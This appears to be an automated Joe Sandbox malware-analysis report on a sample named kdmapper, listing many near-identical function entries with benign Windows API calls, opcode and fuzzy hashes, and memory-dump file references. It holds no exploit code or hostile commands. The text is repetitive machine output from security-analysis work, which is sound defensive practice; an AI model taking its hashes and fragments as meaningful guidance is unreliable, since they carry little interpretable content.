Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 40389e3e667316f43176bc0f070e15f1ee2c15f801593e1b92259063de58bd0a
Instruction ID: b4946403f752bf7b7696fb0ff8087753fa3c3444d91e84ed7d059c5d2bc0531f
Opcode Fuzzy Hash: 40389e3e667316f43176bc0f070e15f1ee2c15f801593e1b92259063de58bd0a
Instruction Fuzzy Hash: 4EE0ED312022255AEA712A22DE04B9B7698DB523B8F123121BCC8B60D2CF20CC8282E5

Function 00DE5ABD Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00DE5AC2

Part of subcall function 00DEB505: __EH_prolog.LIBCMT ref: 00DEB50A

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 270775ea2aea1cb159cd7fd71b57e3cec399ff69f143d5b1c25afebbe85fa7b6
Instruction ID: 5a5f062105d06cdaf01621ce87344e1e494808b9b7ec4613cc1e6752ee43df43
Opcode Fuzzy Hash: 270775ea2aea1cb159cd7fd71b57e3cec399ff69f143d5b1c25afebbe85fa7b6
Instruction Fuzzy Hash: 6C018C308106D8DAD725E7B8C0517EDFBA8DF64304F51848EA55AA3383CBB42B08D7B2

Function 00DEA56D Relevance: 1.5, APIs: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6C4
Part of subcall function 00DEA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
Part of subcall function 00DEA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00DEA592,000000FF,?,?), ref: 00DEA6FE

FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00DEA598

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Find$FileFirst$CloseErrorLast
String ID:
API String ID: 1464966427-0
Opcode ID: 38b34a651f7e439cca196eff193a1048828a31fcc7320da007f2096d3d12ac91
Instruction ID: e2d3bbfbf0c0e3b1eefee61210e4fca51763ddd2a9a182a2933e8e329751e1a9
Opcode Fuzzy Hash: 38b34a651f7e439cca196eff193a1048828a31fcc7320da007f2096d3d12ac91
Instruction Fuzzy Hash: AAF082310087D1AACB227BB98904BCB7BD0AF1A331F158A4DF1FD62196C27560989B33

Function 00DF0E08 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON

Download Yara Rule

APIs

SetThreadExecutionState.KERNEL32(00000001), ref: 00DF0E3D

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: ExecutionStateThread
String ID:
API String ID: 2211380416-0
Opcode ID: bdcca9f05651c44d731ce41fb895ae6b8b60bbafcf2b6272ee982a27bc4f02f3
Instruction ID: 451a4042d8c291281bb429641b056d5812fcf3e0ec75681244b3304eb09223bc
Opcode Fuzzy Hash: bdcca9f05651c44d731ce41fb895ae6b8b60bbafcf2b6272ee982a27bc4f02f3
Instruction Fuzzy Hash: BFD0C210A01098DADB22332A2819BFE2E0ACFE7710F0E40A5B64967183CA444886A271

Function 00DFA626 Relevance: 1.5, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GdipAlloc.GDIPLUS(00000010), ref: 00DFA62C

Part of subcall function 00DFA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00DFA3DA

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Gdip$AllocBitmapCreateFromStream
String ID:
API String ID: 1915507550-0
Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction ID: 13b3177c5e697f0051426fe81149653ffccb00dc5a5ca993e46ae22f45ad1817
Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
Instruction Fuzzy Hash: 24D0C7B521060DB6DF416B658C12A7E7A95EB40340F05C125BE49D5151EAB1DA109572

Function 00DFE5BB Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadProtectSection.DELAYIMP ref: 00DFE5E3

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: DloadProtectSection
String ID:
API String ID: 2203082970-0
Opcode ID: 230f975436c3a1c9c41ed8db6658fc99f6c5050b0a51e193e278bf49eca7cbd9
Instruction ID: afc30a87d97a1ea1240a0145112dffe08789fdac4e25fae0a07f91321c6e7f12
Opcode Fuzzy Hash: 230f975436c3a1c9c41ed8db6658fc99f6c5050b0a51e193e278bf49eca7cbd9
Instruction Fuzzy Hash: 4FD0A9B42C83488ECA09FBA9AC827343350B320741F97C081B344E62B1CA6080C9C631

Function 00DFDD6D Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00DF1B3E), ref: 00DFDD92

Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010420,?), ref: 00DFB59E
Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekSendTranslate
String ID:
API String ID: 897784432-0
Opcode ID: 7901f99baf8bd1d08f4e6cc7e7d074b4baa23eb7da9d6e62f46628ab3e148751
Instruction ID: 15ad23f29b84bea8221dec06d691a658e336c2612f927852867edd2b286b7b45
Opcode Fuzzy Hash: 7901f99baf8bd1d08f4e6cc7e7d074b4baa23eb7da9d6e62f46628ab3e148751
Instruction Fuzzy Hash: 9AD09E31144300BFD6112B52CE06F1A7AA2EB98B04F004555B384740B2C6729D21DB25

Function 00DE98BC Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(000000FF,00DE97BE), ref: 00DE98C8

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: ed86f761750f741caac4339a1b9c156e9e84afe0ce15ba373232fc8d0c46698c
Instruction ID: 23cc47e37982469721e39b2342948891bb3dc47cad441b19c6c22b7f77554f3b
Opcode Fuzzy Hash: ed86f761750f741caac4339a1b9c156e9e84afe0ce15ba373232fc8d0c46698c
Instruction Fuzzy Hash: ECC01234401145898E206A3698940D9F311AB933657B88795C028850B1C322CC47EA21

Function 00DFE1D1 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9d9de2a872ee66dee440250dc1b9184d967a51bf2e9a00cccd53dc1c2d7f9eed
Instruction ID: 0de14c77d32587533d9745899fcda72a4d3fa9f6a96be1f82a478871a139a405
Opcode Fuzzy Hash: 9d9de2a872ee66dee440250dc1b9184d967a51bf2e9a00cccd53dc1c2d7f9eed
Instruction Fuzzy Hash: C8B012E5299344BD311421562C03C37030DC0C1B20331D43EFD02E0491D840EC400471

Function 00DFE1F6 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6b410f49d71b52e10912961d9867f7f0a10c1555179c0a54b8d9303186d02709
Instruction ID: cee6440cfef75653526211d8785bf38c3672e6fa98b9ae130334a8fdaca2e1d2
Opcode Fuzzy Hash: 6b410f49d71b52e10912961d9867f7f0a10c1555179c0a54b8d9303186d02709
Instruction Fuzzy Hash: 94B012E1299344AC311466162C03C37034DC0C1B20331D13EFD06D0290D840EC440471

Function 00DFE1EC Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3b268c08203014319f3d9d4e9fe24458420bf2b0b3eb4e2c0d475e3af59c24a0
Instruction ID: 8fc19168747eefd24798642f085694087d89a2507cc302be792de802f2d66cfa
Opcode Fuzzy Hash: 3b268c08203014319f3d9d4e9fe24458420bf2b0b3eb4e2c0d475e3af59c24a0
Instruction Fuzzy Hash: 39B012E529D308AD3114615A2C03C37030DC0C0B20331D03EF906D0191D840AC400571

Function 00DFEAE7 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFEAF9

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 3bf66f76e2ecb8a75c13f962722fc017f32ba42355c79af7c219b995eeb93c47
Instruction ID: aa68d9f016eff94e9e335cd6f491566a8cb654f087a3070c5915212897ea3c49
Opcode Fuzzy Hash: 3bf66f76e2ecb8a75c13f962722fc017f32ba42355c79af7c219b995eeb93c47
Instruction Fuzzy Hash: 57B012D62DA3C67C320472502D03C37830CC1C0FE0331E12FF601E40A1DC804C410471

Function 00DFE282 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 9b355e6145213f5dda6e7279b2f53c1c1fdf53501f636c392bacb51d5f213063
Instruction ID: 5aa4b14dc8f7523d8d5f1eeb7e8d9fc7c2d1ab57d9382b367289a228d0876866
Opcode Fuzzy Hash: 9b355e6145213f5dda6e7279b2f53c1c1fdf53501f636c392bacb51d5f213063
Instruction Fuzzy Hash: 66B012F1299304AC312461162D03C37438DC0C0B20331D03EF906E0190DC40AD410471

Function 00DFE250 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 6458c562476fbdf23a456502308b27175b4b57712a8a744b2ef808f7b56bc85a
Instruction ID: de956191ad7b4370edc3d3f9d2caea9e7371b9fae8258d5b8103edd3d47f45f6
Opcode Fuzzy Hash: 6458c562476fbdf23a456502308b27175b4b57712a8a744b2ef808f7b56bc85a
Instruction Fuzzy Hash: 66B012F129A344BC315462162C03C37430EC1C0B20331D13EF906D0190D840AC840471

Function 00DFE246 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 48c3e06ed106e7ff0502b9dfad820f42460adaed74093387f9b3f75e222658e5
Instruction ID: 97d37b8fb4c09b20e1293486364986de30ef2fe68af9f5ab34dc9c72412388bb
Opcode Fuzzy Hash: 48c3e06ed106e7ff0502b9dfad820f42460adaed74093387f9b3f75e222658e5
Instruction Fuzzy Hash: 3FB012E129A384AC311461162C03C37430EC1C1B20331D03EFD06D0190D840EC400471

Function 00DFE26E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 5d6192885fc37e2e82e9232f4a3b77432c08c2916954b7e28d5c3f45acc0cb37
Instruction ID: e20898d37f7f8c98857d68800dc86090a68b4643de7be9444b3f237c31de97ae
Opcode Fuzzy Hash: 5d6192885fc37e2e82e9232f4a3b77432c08c2916954b7e28d5c3f45acc0cb37
Instruction Fuzzy Hash: 64B012E5299344AC312461262C03C37034DC0C1B20331D03EFE06E0190D840EC400471

Function 00DFE264 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E25000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314561726.0000000000E42000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314974719.0000000000E43000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_de0000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 1168598634ba50990513695868dc9ea34249863edb96bbe5a21ea9a531aa5e3a
Instruction ID: 889a4ca7c4bd5361f4d3e4a2fd5cd6fa83c6c0fb0e19af15ee2dba9a5b12769b
Opcode Fuzzy Hash: 1168598634ba50990513695868dc9ea34249863edb96bbe5a21ea9a531aa5e3a
Instruction Fuzzy Hash: 1FB012E12AA344AC311461162C03C37434EC5C0B20331D03EF907D0190D840AC400471

Function 00DFE21E Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00DFE1E3

Part of subcall function 00DFE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DFE8D0
Part of subcall function 00DFE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DFE8E1

Memory Dump Source

Source File: 0000000C.00000002.1314503940.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true

Associated: 0000000C.00000002.1314480122.0000000000DE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000C.00000002.1314539752.0000000000E13000.00000002.00000001.01000000.00000006.sdmpDownload File
